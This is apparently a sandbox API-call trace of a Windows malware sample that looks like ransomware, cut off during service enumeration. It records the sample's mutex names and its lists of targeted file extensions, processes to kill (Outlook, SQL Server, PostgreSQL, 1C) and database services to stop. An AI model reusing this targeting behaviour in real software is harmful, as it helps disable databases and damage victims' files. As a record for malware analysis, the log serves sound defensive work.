# Flog Txt Version 1 # Analyzer Version: 3.0.2 # Analyzer Build Date: May 3 2019 14:51:36 # Log Creation Date: 05.05.2019 21:59:58.306 Process: id = "1" image_name = "hgaibc.exe" filename = "c:\\users\\fd1hvy\\desktop\\hgaibc.exe" page_root = "0x6d4cd000" os_pid = "0xe0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\hgaibc.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x408 [0031.141] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75e90000 [0031.141] GetProcAddress (hModule=0x75e90000, lpProcName="GetProcAddress") returned 0x75ea51b0 [0031.141] GetProcAddress (hModule=0x75e90000, lpProcName="GetModuleHandleW") returned 0x75ea50d0 [0031.142] GetProcAddress (hModule=0x75e90000, lpProcName="FindNextFileW") returned 0x75efee40 [0031.142] GetProcAddress (hModule=0x75e90000, lpProcName="FindClose") returned 0x75efed70 [0031.142] GetProcAddress (hModule=0x75e90000, lpProcName="MoveFileW") returned 0x75ede500 [0031.142] GetProcAddress (hModule=0x75e90000, lpProcName="GetFileSizeEx") returned 0x75efef40 [0031.142] GetProcAddress (hModule=0x75e90000, lpProcName="GetModuleFileNameW") returned 0x75ea5090 [0031.142] GetProcAddress (hModule=0x75e90000, lpProcName="GetFileAttributesW") returned 0x75efef10 [0031.142] GetProcAddress (hModule=0x75e90000, lpProcName="ExitProcess") returned 0x75ea3cb0 [0031.142] GetProcAddress (hModule=0x75e90000, lpProcName="GetCommandLineW") returned 0x75ea4cc0 [0031.142] GetProcAddress (hModule=0x75e90000, lpProcName="GetComputerNameW") returned 0x75ed32c0 [0031.142] GetProcAddress (hModule=0x75e90000, lpProcName="GetComputerNameA") returned 0x75ed3780 [0031.142] GetProcAddress (hModule=0x75e90000, lpProcName="CreateMutexW") returned 0x75efeb70 [0031.142] GetProcAddress (hModule=0x75e90000, lpProcName="lstrlenW") returned 0x75ea6c70 [0031.142] GetProcAddress (hModule=0x75e90000, lpProcName="lstrlenA") returned 0x75ea6c50 [0031.142] GetProcAddress (hModule=0x75e90000, lpProcName="GetCurrentProcess") returned 0x75efea10 [0031.142] GetProcAddress (hModule=0x75e90000, lpProcName="WaitForSingleObject") returned 0x75efeca0 [0031.142] GetProcAddress (hModule=0x75e90000, lpProcName="GetLogicalDrives") returned 0x75ea0d20 [0031.142] GetProcAddress (hModule=0x75e90000, lpProcName="GetTickCount") returned 0x75efdd50 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="DeleteFileW") returned 0x75efed40 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="WideCharToMultiByte") returned 0x75ea6b10 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75efebb0 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="Sleep") returned 0x75ea6760 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="LeaveCriticalSection") returned 0x77bfb250 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="ReadFile") returned 0x75eff090 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="CreateFileW") returned 0x75efed10 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="OpenMutexW") returned 0x75efebf0 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="EnterCriticalSection") returned 0x77bfb2d0 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="WaitForMultipleObjects") returned 0x75efec80 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="lstrcmpiW") returned 0x75ea6bf0 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="lstrcmpiA") returned 0x75ea6bd0 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="DeleteCriticalSection") returned 0x77bdfb90 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="ReleaseMutex") returned 0x75efec20 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="CloseHandle") returned 0x75efeab0 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="GetVersion") returned 0x75ea56c0 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="CreateThread") returned 0x75ea46b0 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="ExpandEnvironmentStringsW") returned 0x75ea4a40 [0031.143] GetProcAddress (hModule=0x75e90000, lpProcName="QueryPerformanceCounter") returned 0x75ea5da0 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="QueryPerformanceFrequency") returned 0x75ea5dc0 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="GetCurrentProcessId") returned 0x75efea20 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="SetFileAttributesW") returned 0x75eff100 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="GetVolumeInformationW") returned 0x75eff020 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="WriteFile") returned 0x75eff180 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="SetFilePointerEx") returned 0x75eff130 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="SetEndOfFile") returned 0x75eff0e0 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="FindFirstFileW") returned 0x75efedf0 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="GetProcessHeap") returned 0x75ea51f0 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="HeapReAlloc") returned 0x77bef630 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="HeapAlloc") returned 0x77bf2dc0 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="HeapFree") returned 0x75ea57f0 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="CreatePipe") returned 0x75ea4590 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="SetHandleInformation") returned 0x75efeae0 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="CreateProcessW") returned 0x75ea4610 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="CompareStringW") returned 0x75ea4430 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="CompareStringA") returned 0x75ea4410 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="OpenProcess") returned 0x75ea5cc0 [0031.144] GetProcAddress (hModule=0x75e90000, lpProcName="TerminateProcess") returned 0x75ea67e0 [0031.145] GetProcAddress (hModule=0x75e90000, lpProcName="GetSystemTime") returned 0x75ea54e0 [0031.145] GetProcAddress (hModule=0x75e90000, lpProcName="SystemTimeToFileTime") returned 0x75ea67a0 [0031.145] GetProcAddress (hModule=0x75e90000, lpProcName="GetLastError") returned 0x75ea5010 [0031.145] GetProcAddress (hModule=0x75e90000, lpProcName="CreateToolhelp32Snapshot") returned 0x75ededc0 [0031.145] GetProcAddress (hModule=0x75e90000, lpProcName="Process32NextW") returned 0x75edf8f0 [0031.145] GetProcAddress (hModule=0x75e90000, lpProcName="Process32FirstW") returned 0x75edf750 [0031.145] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x761b0000 [0033.724] GetProcAddress (hModule=0x761b0000, lpProcName="RegOpenKeyExW") returned 0x761ce580 [0033.724] GetProcAddress (hModule=0x761b0000, lpProcName="RegQueryValueExW") returned 0x761ce5a0 [0033.724] GetProcAddress (hModule=0x761b0000, lpProcName="RegSetValueExW") returned 0x761cf530 [0033.724] GetProcAddress (hModule=0x761b0000, lpProcName="RegCloseKey") returned 0x761ced60 [0033.724] GetProcAddress (hModule=0x761b0000, lpProcName="OpenProcessToken") returned 0x761cefb0 [0033.724] GetProcAddress (hModule=0x761b0000, lpProcName="GetTokenInformation") returned 0x761cee90 [0033.724] GetProcAddress (hModule=0x761b0000, lpProcName="OpenSCManagerW") returned 0x761d0540 [0033.724] GetProcAddress (hModule=0x761b0000, lpProcName="OpenServiceW") returned 0x761cfa20 [0033.724] GetProcAddress (hModule=0x761b0000, lpProcName="CloseServiceHandle") returned 0x761cfc00 [0033.724] GetProcAddress (hModule=0x761b0000, lpProcName="ControlService") returned 0x761e26d0 [0033.724] GetProcAddress (hModule=0x761b0000, lpProcName="QueryServiceStatus") returned 0x761d2380 [0033.724] GetProcAddress (hModule=0x761b0000, lpProcName="EnumDependentServicesW") returned 0x761e2f70 [0033.724] GetProcAddress (hModule=0x761b0000, lpProcName="EnumServicesStatusExW") returned 0x761cfc80 [0033.724] LoadLibraryA (lpLibFileName="user32.dll") returned 0x74b70000 [0036.763] GetProcAddress (hModule=0x74b70000, lpProcName="SystemParametersInfoW") returned 0x74b9f210 [0036.763] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x76480000 [0042.169] GetProcAddress (hModule=0x76480000, lpProcName="ShellExecuteExW") returned 0x765e4730 [0042.169] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77bb0000 [0042.169] GetProcAddress (hModule=0x77bb0000, lpProcName="NtQuerySystemInformation") returned 0x77c22070 [0042.169] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74500000 [0042.291] GetProcAddress (hModule=0x74500000, lpProcName="WNetCloseEnum") returned 0x74502640 [0042.292] GetProcAddress (hModule=0x74500000, lpProcName="WNetOpenEnumW") returned 0x74502790 [0042.292] GetProcAddress (hModule=0x74500000, lpProcName="WNetEnumResourceW") returned 0x74502410 [0042.292] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x746a0000 [0042.520] GetProcAddress (hModule=0x746a0000, lpProcName="WSAStartup") returned 0x746a5b40 [0042.520] GetProcAddress (hModule=0x746a0000, lpProcName="socket") returned 0x746b4510 [0042.521] GetProcAddress (hModule=0x746a0000, lpProcName="send") returned 0x746a5030 [0042.521] GetProcAddress (hModule=0x746a0000, lpProcName="recv") returned 0x746b0c50 [0042.521] GetProcAddress (hModule=0x746a0000, lpProcName="connect") returned 0x746a5410 [0042.521] GetProcAddress (hModule=0x746a0000, lpProcName="closesocket") returned 0x746b0910 [0042.521] GetProcAddress (hModule=0x746a0000, lpProcName="gethostbyname") returned 0x746d6cb0 [0042.521] GetProcAddress (hModule=0x746a0000, lpProcName="inet_addr") returned 0x746b9160 [0042.521] GetProcAddress (hModule=0x746a0000, lpProcName="ntohl") returned 0x746a49d0 [0042.521] GetProcAddress (hModule=0x746a0000, lpProcName="htonl") returned 0x746a49d0 [0042.521] GetProcAddress (hModule=0x746a0000, lpProcName="htons") returned 0x746b8ff0 [0042.521] GetProcessHeap () returned 0x5d0000 [0042.521] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x20) returned 0x5dafb8 [0042.521] QueryPerformanceCounter (in: lpPerformanceCount=0x19fdb0 | out: lpPerformanceCount=0x19fdb0*=13390446661) returned 1 [0042.522] GetTickCount () returned 0x20af3 [0042.522] GetCurrentProcessId () returned 0xe0c [0042.523] GetTickCount () returned 0x20af3 [0042.523] GetTickCount () returned 0x20af3 [0042.523] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x20) returned 0x5db030 [0042.523] GetVersion () returned 0x23f00206 [0042.523] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x7) returned 0x5e6e20 [0042.523] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x5e7548 [0042.523] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e7548, Size=0x20) returned 0x5dac98 [0042.523] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5dac98, Size=0x40) returned 0x5ea618 [0042.523] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x5ee760 [0042.523] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_1TPBM0A") returned 0x0 [0042.523] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_1TPBM0A") returned 0x1ec [0042.523] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e6e20 | out: hHeap=0x5d0000) returned 1 [0042.523] lstrlenW (lpString="Global\\syncronize_") returned 18 [0042.523] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5ea618 | out: hHeap=0x5d0000) returned 1 [0042.523] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x7) returned 0x5e6e50 [0042.524] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x5e7788 [0042.524] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e7788, Size=0x20) returned 0x5dac98 [0042.524] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5dac98, Size=0x40) returned 0x5ea420 [0042.524] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x5fe768 [0042.524] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_1TPBM0U") returned 0x0 [0042.524] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_1TPBM0U") returned 0x1f0 [0042.524] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e6e50 | out: hHeap=0x5d0000) returned 1 [0042.524] lstrlenW (lpString="Global\\syncronize_") returned 18 [0042.524] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5ea420 | out: hHeap=0x5d0000) returned 1 [0042.524] GetVersion () returned 0x23f00206 [0042.524] GetCurrentProcess () returned 0xffffffff [0042.524] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fd9c | out: TokenHandle=0x19fd9c*=0x1f4) returned 1 [0042.524] GetTokenInformation (in: TokenHandle=0x1f4, TokenInformationClass=0x14, TokenInformation=0x19fd98, TokenInformationLength=0x4, ReturnLength=0x19fda4 | out: TokenInformation=0x19fd98, ReturnLength=0x19fda4) returned 1 [0042.524] CloseHandle (hObject=0x1f4) returned 1 [0042.524] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x0) returned 0x0 [0042.524] WaitForSingleObject (hHandle=0x1ec, dwMilliseconds=0x3e8) returned 0x0 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x14) returned 0x5e53b0 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x5e75c0 [0042.525] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e75c0, Size=0x20) returned 0x5dac98 [0042.525] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5dac98, Size=0x40) returned 0x5ea6a8 [0042.525] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea6a8, Size=0x80) returned 0x5e23b8 [0042.525] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e23b8, Size=0x100) returned 0x5e7358 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x34) returned 0x5e96d8 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e6d00 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e6e20 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x5e6e50 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x5e7788 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e6e60 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x5e74b8 [0042.525] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e6e60, Size=0x8) returned 0x5e6e70 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x5e75c0 [0042.525] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e6e70, Size=0x10) returned 0x5e74d0 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x5e7500 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x5e7548 [0042.525] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e74d0, Size=0x20) returned 0x5dac98 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x5e75d8 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x5e74d0 [0042.525] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e6d00, Size=0x8) returned 0x5e6e60 [0042.525] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e6e20, Size=0x8) returned 0x5e6d00 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x5e6cd0 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x5e7590 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e6e20 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x5e7608 [0042.525] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e6e20, Size=0x8) returned 0x5e6e70 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x5e7800 [0042.525] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e6e70, Size=0x10) returned 0x5e7818 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x5e7830 [0042.525] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x5e6d40 [0042.525] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e7818, Size=0x20) returned 0x60ec78 [0042.525] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e6e60, Size=0x10) returned 0x5e7818 [0042.525] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e6d00, Size=0x10) returned 0x5e7848 [0042.526] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x5e6e20 [0042.526] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x5e7860 [0042.526] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e6e60 [0042.526] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x5e77e8 [0042.526] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e6e60, Size=0x8) returned 0x5e6e70 [0042.526] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x5e6e60 [0042.526] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x5e7878 [0042.526] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e6e80 [0042.526] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x5e77b8 [0042.526] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e6e80, Size=0x8) returned 0x5e6ce0 [0042.526] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e7818, Size=0x20) returned 0x60eb88 [0042.526] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e7848, Size=0x20) returned 0x60ec50 [0042.526] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x5e6e80 [0042.526] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x5e77d0 [0042.526] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x5e6d10 [0042.526] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x5e7818 [0042.526] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e6d10, Size=0x8) returned 0x5e6d00 [0042.526] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x14) returned 0x5e51d0 [0042.526] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x14) returned 0x5e51b0 [0042.526] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0042.526] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e7358 | out: hHeap=0x5d0000) returned 1 [0042.526] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19fde8 | out: lpWSAData=0x19fde8) returned 0 [0042.531] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x5e7848 [0042.531] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e7848, Size=0x20) returned 0x60e930 [0042.531] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60e930, Size=0x40) returned 0x5ea738 [0042.531] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea738, Size=0x80) returned 0x5e7d68 [0042.531] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e7d68, Size=0x100) returned 0x5e7358 [0042.531] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x5e7848 [0042.531] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e7848, Size=0x20) returned 0x60ea48 [0042.531] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60ea48, Size=0x40) returned 0x5ea540 [0042.531] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea540, Size=0x80) returned 0x6149e0 [0042.531] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6149e0, Size=0x100) returned 0x615030 [0042.531] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x5e7848 [0042.531] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x613210 [0042.531] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615438 [0042.531] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x613210, Size=0x8) returned 0x613340 [0042.531] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x14) returned 0x5e53d0 [0042.531] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x613340, Size=0x10) returned 0x615198 [0042.531] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x18) returned 0x5e5350 [0042.531] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1a) returned 0x60eac0 [0042.531] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615198, Size=0x20) returned 0x60eb60 [0042.531] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1c) returned 0x60e7c8 [0042.531] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x16) returned 0x5e5330 [0042.531] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1a) returned 0x60e7f0 [0042.531] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x615378 [0042.531] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x6132f0 [0042.532] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40) returned 0x5ea420 [0042.532] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6132f0, Size=0x8) returned 0x613280 [0042.532] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x3c) returned 0x5ea468 [0042.532] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x613280, Size=0x10) returned 0x615390 [0042.532] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x14) returned 0x5e5490 [0042.532] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x18) returned 0x5e5410 [0042.532] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615390, Size=0x20) returned 0x60e8b8 [0042.532] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x24) returned 0x5e6168 [0042.532] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0042.532] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e7358 | out: hHeap=0x5d0000) returned 1 [0042.532] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0042.532] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x615030 | out: hHeap=0x5d0000) returned 1 [0042.532] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60e980 [0042.535] EnumServicesStatusExW (in: hSCManager=0x60e980, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0) returned 0 [0042.536] GetLastError () returned 0xea [0042.536] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1c18) returned 0x617728 [0042.536] EnumServicesStatusExW (in: hSCManager=0x60e980, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x617728, cbBufSize=0x1c18, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x617728, pcbBytesNeeded=0x19fd84, lpServicesReturned=0x19fd9c, lpResumeHandle=0x0) returned 1 [0042.537] CloseServiceHandle (hSCObject=0x60e980) returned 1 [0042.538] lstrlenW (lpString="Appinfo") returned 7 [0042.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0042.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0042.541] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0042.541] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0042.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0042.541] lstrlenW (lpString="AppXSvc") returned 7 [0042.541] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0042.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0042.541] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0042.541] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0042.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0042.541] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0042.541] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0042.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0042.541] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0042.542] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0042.542] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0042.542] lstrlenW (lpString="Audiosrv") returned 8 [0042.542] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0042.542] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0042.542] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0042.542] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0042.542] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0042.542] lstrlenW (lpString="BFE") returned 3 [0042.542] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", 